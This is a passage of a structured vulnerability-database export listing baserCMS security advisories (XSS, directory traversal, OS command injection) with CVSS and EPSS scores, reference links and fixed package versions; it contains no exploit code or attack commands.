scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0575
reference_id CVE-2018-0575
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0575
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0575, GHSA-w935-p7mg-xc96
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r4jc-22rq-d3cb
36
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary 
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in Blog posts and Contents list Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
37
url VCID-u16w-rbuk-ybfs
vulnerability_id VCID-u16w-rbuk-ybfs
summary 
baserCMS Directory Traversal vulnerability in Form submission data management Feature
There is a Directory Traversal Vulnerability in Form submission data management Feature to baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.8 and earlier versions

### Vulnerability
There is a possibility that information on the server may be obtained by a user who is logged in to the management screen.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_45547161

### Credits
Shiga Takuma@BroadBand Security, Inc
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
reference_id
reference_type
scores
0
value 0.00289
scoring_system epss
scoring_elements 0.52624
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
1
reference_url https://basercms.net/security/JVN_81174674
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://basercms.net/security/JVN_81174674
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/commit/7555a5cf0006755dc0223fffc2d882b50a97758b
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43648
5
reference_url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
url https://github.com/advisories/GHSA-hmqj-gv2m-hq55
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
reference_id GHSA-hmqj-gv2m-hq55
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-hmqj-gv2m-hq55
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43648, GHSA-hmqj-gv2m-hq55
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u16w-rbuk-ybfs
38
url VCID-uedz-j2vn-cbea
vulnerability_id VCID-uedz-j2vn-cbea
summary 
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
reference_id
reference_type
scores
0
value 0.00755
scoring_system epss
scoring_elements 0.73646
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-51450
1
reference_url https://basercms.net/security/JVN_09767360
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://basercms.net/security/JVN_09767360
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
39
url VCID-vqx2-hzju-r7et
vulnerability_id VCID-vqx2-hzju-r7et
summary 
Cross-site Scripting
baserCMS is affected by Cross Site Scripting (XSS) via arbitrary script execution. Admin access is required to exploit this vulnerability. The affected components is `toolbar.php`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15155
reference_id
reference_type
scores
0
value 0.00868
scoring_system epss
scoring_elements 0.75527
published_at 2026-06-04T12:55:00Z
1
value 0.00868
scoring_system epss
scoring_elements 0.75555
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15155
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/94cbfab74c9fd6d04492597a1a684674c3c0e30f
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-4r3m-j6x5-48m3
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15155
reference_id CVE-2020-15155
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15155
5
reference_url https://github.com/advisories/GHSA-4r3m-j6x5-48m3
reference_id GHSA-4r3m-j6x5-48m3
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4r3m-j6x5-48m3
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15155, GHSA-4r3m-j6x5-48m3
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vqx2-hzju-r7et
40
url VCID-xpsb-2yux-g3cf
vulnerability_id VCID-xpsb-2yux-g3cf
summary 
Cross-site Scripting
Improper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
3
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
reference_id CVE-2021-20683
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20683, GHSA-v9w8-hq92-v39m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xpsb-2yux-g3cf
41
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary 
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)



### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
